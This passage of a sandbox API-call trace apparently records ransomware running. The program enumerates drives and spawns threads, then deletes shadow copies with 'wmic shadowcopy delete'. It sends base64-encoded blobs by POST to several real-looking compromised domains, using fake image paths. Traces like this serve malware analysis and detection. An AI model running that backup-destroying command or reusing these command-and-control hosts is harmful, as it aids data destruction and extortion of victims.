lstrlenW (lpString="dce1bb8bd2ca4def") returned 16 [0041.054] VirtualFree (lpAddress=0x2ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.054] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.055] VirtualFree (lpAddress=0x2ed0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.055] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0041.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x891725, lpParameter=0x2ea0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x278 [0041.056] GetSystemInfo (in: lpSystemInfo=0xdcf6a4 | out: lpSystemInfo=0xdcf6a4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0041.056] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x2ed0000 [0041.056] GetDriveTypeA (lpRootPathName="A:\\") returned 0x1 [0041.056] GetDriveTypeA (lpRootPathName="B:\\") returned 0x1 [0041.056] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0041.057] GetDriveTypeA (lpRootPathName="D:\\") returned 0x1 [0041.057] GetDriveTypeA (lpRootPathName="E:\\") returned 0x1 [0041.057] GetDriveTypeA (lpRootPathName="F:\\") returned 0x1 [0041.057] GetDriveTypeA (lpRootPathName="G:\\") returned 0x1 [0041.057] GetDriveTypeA (lpRootPathName="H:\\") returned 0x1 [0041.057] GetDriveTypeA (lpRootPathName="I:\\") returned 0x1 [0041.057] GetDriveTypeA (lpRootPathName="J:\\") returned 0x1 [0041.057] GetDriveTypeA (lpRootPathName="K:\\") returned 0x1 [0041.058] GetDriveTypeA (lpRootPathName="L:\\") returned 0x1 [0041.058] GetDriveTypeA (lpRootPathName="M:\\") returned 0x1 [0041.058] GetDriveTypeA (lpRootPathName="N:\\") returned 0x1 [0041.058] GetDriveTypeA (lpRootPathName="O:\\") returned 0x1 [0041.058] GetDriveTypeA (lpRootPathName="P:\\") returned 0x1 [0041.058] GetDriveTypeA (lpRootPathName="Q:\\") returned 0x1 [0041.058] GetDriveTypeA (lpRootPathName="R:\\") returned 0x1 [0041.059] GetDriveTypeA (lpRootPathName="S:\\") returned 0x1 [0041.059] GetDriveTypeA (lpRootPathName="T:\\") returned 0x1 [0041.059] GetDriveTypeA (lpRootPathName="U:\\") returned 0x1 [0041.059] GetDriveTypeA (lpRootPathName="V:\\") returned 0x1 [0041.059] GetDriveTypeA (lpRootPathName="W:\\") returned 0x1 [0041.059] GetDriveTypeA (lpRootPathName="X:\\") returned 0x1 [0041.059] GetDriveTypeA (lpRootPathName="Y:\\") returned 0x1 [0041.059] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2ef0000 [0041.060] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0041.060] lstrcpyA (in: lpString1=0x2f70000, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0041.060] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x891474, lpParameter=0x2f70000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x264 [0041.061] WaitForMultipleObjects (nCount=0x1, lpHandles=0x2ef0000*=0x264, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0101.468] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0101.468] VirtualFree (lpAddress=0x2ed0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.469] VirtualFree (lpAddress=0x2ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.469] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.469] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.470] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0101.470] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0101.470] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0101.470] VerifyVersionInfoW (in: lpVersionInformation=0xdcf544, dwTypeMask=0x23, dwlConditionMask=0x1801b | out: lpVersionInformation=0xdcf544) returned 1 [0101.470] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x2e90000 [0101.470] GetSystemDirectoryW (in: lpBuffer=0x2e90000, uSize=0x100 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.470] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\wbem\\wmic.exe" | out: lpString1="C:\\Windows\\system32\\wbem\\wmic.exe") returned="C:\\Windows\\system32\\wbem\\wmic.exe" [0101.470] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Windows\\system32\\wbem\\wmic.exe", lpParameters="shadowcopy delete", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0106.987] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0106.988] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xe1c Thread: id = 3 os_tid = 0xe20 [0036.408] GetTickCount () returned 0x1b9b6 [0036.409] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.billerimpex.com") returned 27 [0036.410] lstrcpyW (in: lpString1=0x2e8d880, lpString2="includes" | out: lpString1="includes") returned="includes" [0036.410] lstrcpyW (in: lpString1=0x2e8da80, lpString2="assets" | out: lpString1="assets") returned="assets" [0036.410] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="de" | out: lpString1="de") returned="de" [0036.410] lstrcatW (in: lpString1="de", lpString2="de" | out: lpString1="dede") returned="dede" [0036.410] lstrcatW (in: lpString1="dede", lpString2="me" | out: lpString1="dedeme") returned="dedeme" [0036.410] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0036.410] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.billerimpex.com/includes/assets/dedeme.png") returned 54 [0036.410] lstrlenW (lpString="http://www.billerimpex.com/includes/assets/dedeme.png") returned 54 [0036.410] lstrcpyW (in: lpString1=0x2e8d618, lpString2="includes/assets/dedeme.png" | out: lpString1="includes/assets/dedeme.png") returned="includes/assets/dedeme.png" [0036.410] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0040.746] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0040.746] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.billerimpex.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0041.085] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0041.085] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0041.087] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0044.604] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0044.604] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0044.624] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0044.627] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0044.627] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0044.627] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0044.628] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0044.628] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0044.628] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0044.628] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0044.628] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0044.628] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.billerimpex.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0044.628] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3880000 [0044.628] wsprintfW (in: param_1=0x3880000, param_2="%s" | out: param_1="includes/assets/dedeme.png") returned 26 [0044.628] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="includes/assets/dedeme.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0044.629] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3870000*, dwOptionalLength=0x24c | out: lpOptional=0x3870000*) returned 1 [0044.999] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0045.000] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0045.000] VirtualFree (lpAddress=0x3880000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.000] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.001] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0045.001] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.macartegrise.eu") returned 26 [0045.001] lstrcpyW (in: lpString1=0x2e8d880, lpString2="static" | out: lpString1="static") returned="static" [0045.001] lstrcpyW (in: lpString1=0x2e8da80, lpString2="images" | out: lpString1="images") returned="images" [0045.001] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="es" | out: lpString1="es") returned="es" [0045.001] lstrcatW (in: lpString1="es", lpString2="zu" | out: lpString1="eszu") returned="eszu" [0045.001] lstrcatW (in: lpString1="eszu", lpString2="mo" | out: lpString1="eszumo") returned="eszumo" [0045.001] lstrcatW (in: lpString1="eszumo", lpString2="de" | out: lpString1="eszumode") returned="eszumode" [0045.001] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0045.001] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.macartegrise.eu/static/images/eszumode.png") returned 53 [0045.001] lstrlenW (lpString="http://www.macartegrise.eu/static/images/eszumode.png") returned 53 [0045.001] lstrcpyW (in: lpString1=0x2e8d618, lpString2="static/images/eszumode.png" | out: lpString1="static/images/eszumode.png") returned="static/images/eszumode.png" [0045.001] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0045.001] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0045.001] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.macartegrise.eu", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0045.001] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0045.001] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0045.001] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0046.230] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0046.230] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0046.230] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0046.233] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0046.233] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0046.233] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0046.233] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0046.233] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0046.233] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0046.233] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0046.233] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0046.233] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.macartegrise.eu", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0046.233] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3880000 [0046.234] wsprintfW (in: param_1=0x3880000, param_2="%s" | out: param_1="static/images/eszumode.png") returned 26 [0046.234] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="static/images/eszumode.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0046.234] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3870000*, dwOptionalLength=0x24c | out: lpOptional=0x3870000*) returned 1 [0046.862] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0046.863] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0046.863] VirtualFree (lpAddress=0x3880000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.864] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.864] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0046.864] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.poketeg.com") returned 22 [0046.864] lstrcpyW (in: lpString1=0x2e8d880, lpString2="content" | out: lpString1="content") returned="content" [0046.865] lstrcpyW (in: lpString1=0x2e8da80, lpString2="graphic" | out: lpString1="graphic") returned="graphic" [0046.865] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="fu" | out: lpString1="fu") returned="fu" [0046.865] lstrcatW (in: lpString1="fu", lpString2="am" | out: lpString1="fuam") returned="fuam" [0046.865] lstrcatW (in: lpString1="fuam", lpString2="mo" | out: lpString1="fuammo") returned="fuammo" [0046.865] lstrcatW (in: lpString1="fuammo", lpString2="ru" | out: lpString1="fuammoru") returned="fuammoru" [0046.865] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0046.865] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.poketeg.com/content/graphic/fuammoru.jpg") returned 51 [0046.865] lstrlenW (lpString="http://www.poketeg.com/content/graphic/fuammoru.jpg") returned 51 [0046.865] lstrcpyW (in: lpString1=0x2e8d618, lpString2="content/graphic/fuammoru.jpg" | out: lpString1="content/graphic/fuammoru.jpg") returned="content/graphic/fuammoru.jpg" [0046.865] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0046.865] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0046.865] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.poketeg.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0046.865] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0046.865] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0046.865] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0047.471] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0047.471] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0047.471] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0047.565] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0047.565] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0047.565] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0047.565] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0047.565] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0047.565] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0047.565] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0047.565] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0047.565] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.poketeg.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0047.565] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3880000 [0047.566] wsprintfW (in: param_1=0x3880000, param_2="%s" | out: param_1="content/graphic/fuammoru.jpg") returned 28 [0047.566] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="content/graphic/fuammoru.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0047.566] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3870000*, dwOptionalLength=0x24c | out: lpOptional=0x3870000*) returned 1 [0049.565] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0049.643] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0049.643] VirtualFree (lpAddress=0x3880000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.644] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.644] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0049.644] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://perovaphoto.ru") returned 21 [0049.644] lstrcpyW (in: lpString1=0x2e8d880, lpString2="uploads" | out: lpString1="uploads") returned="uploads" [0049.644] lstrcpyW (in: lpString1=0x2e8da80, lpString2="images" | out: lpString1="images") returned="images" [0049.644] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="fu" | out: lpString1="fu") returned="fu" [0049.644] lstrcatW (in: lpString1="fu", lpString2="so" | out: lpString1="fuso") returned="fuso" [0049.644] lstrcatW (in: lpString1="fuso", lpString2="ru" | out: lpString1="fusoru") returned="fusoru" [0049.644] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0049.644] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://perovaphoto.ru/uploads/images/fusoru.jpg") returned 47 [0049.644] lstrlenW (lpString="http://perovaphoto.ru/uploads/images/fusoru.jpg") returned 47 [0049.644] lstrcpyW (in: lpString1=0x2e8d618, lpString2="uploads/images/fusoru.jpg" | out: lpString1="uploads/images/fusoru.jpg") returned="uploads/images/fusoru.jpg" [0049.644] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0049.644] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0049.644] InternetConnectW (hInternet=0xcc0008, lpszServerName="perovaphoto.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0049.644] wsprintfW (in: 